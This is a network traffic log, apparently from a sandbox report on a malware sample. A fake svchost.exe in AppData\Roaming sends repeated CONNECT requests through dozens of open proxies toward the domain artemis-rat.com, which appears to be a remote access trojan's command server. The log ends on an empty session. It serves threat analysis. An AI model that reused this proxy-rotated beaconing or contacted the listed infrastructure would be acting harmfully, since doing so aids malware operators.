Mar 9, 2024 13:14:37.991179943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146224022 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3678	192.168.2.5	61642	43.155.130.182	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.997962952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3679	192.168.2.5	58413	89.36.114.38	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.006280899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3680	192.168.2.5	61652	36.91.98.115	8181	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.018260002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849144936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3681	192.168.2.5	58425	132.148.154.98	50965	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.030270100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3682	192.168.2.5	61645	120.76.42.209	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.031286955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849142075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3683	192.168.2.5	61717	27.96.235.171	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.041199923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3684	192.168.2.5	60486	208.87.131.240	22566	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.043554068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3685	192.168.2.5	61694	155.185.15.56	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.044732094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.454185009 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3686	192.168.2.5	61789	104.19.83.128	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.045922995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.200264931 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3687	192.168.2.5	61654	103.49.202.250	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.049516916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3688	192.168.2.5	61679	139.224.64.191	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.049642086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.388667107 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3689	192.168.2.5	61671	185.104.112.62	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.053703070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.401191950 CET	799	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:38 GMT Server: Apache/2.4.56 (Debian) Content-Length: 607 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3690	192.168.2.5	61731	72.195.114.169	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.058546066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3691	192.168.2.5	61702	110.12.211.140	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.058547020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3692	192.168.2.5	61699	185.158.114.14	25697	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.065385103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3693	192.168.2.5	60484	167.99.124.118	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.071484089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3694	192.168.2.5	61820	164.92.86.113	64110	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.104005098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.677150011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3695	192.168.2.5	61718	41.223.108.13	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.135885000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3696	192.168.2.5	61738	45.138.87.238	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.144659996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3697	192.168.2.5	61860	34.49.208.221	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.145734072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3698	192.168.2.5	61845	64.225.48.234	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.195036888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849072933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3699	192.168.2.5	61787	18.134.236.231	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.195036888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.491087914 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:38 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3700	192.168.2.5	61877	172.67.181.32	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.195439100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.349749088 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3701	192.168.2.5	61790	95.164.89.123	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.197068930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3702	192.168.2.5	61831	35.79.120.242	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.203224897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.479047060 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:38 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3703	192.168.2.5	61775	78.30.128.10	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.203651905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3704	192.168.2.5	61798	195.90.216.75	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.205904007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3705	192.168.2.5	61814	198.105.111.15	6693	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.206207991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.496293068 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3706	192.168.2.5	61773	111.90.150.109	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.208092928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3707	192.168.2.5	58588	156.67.214.232	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.210900068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3708	192.168.2.5	61776	38.54.16.97	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
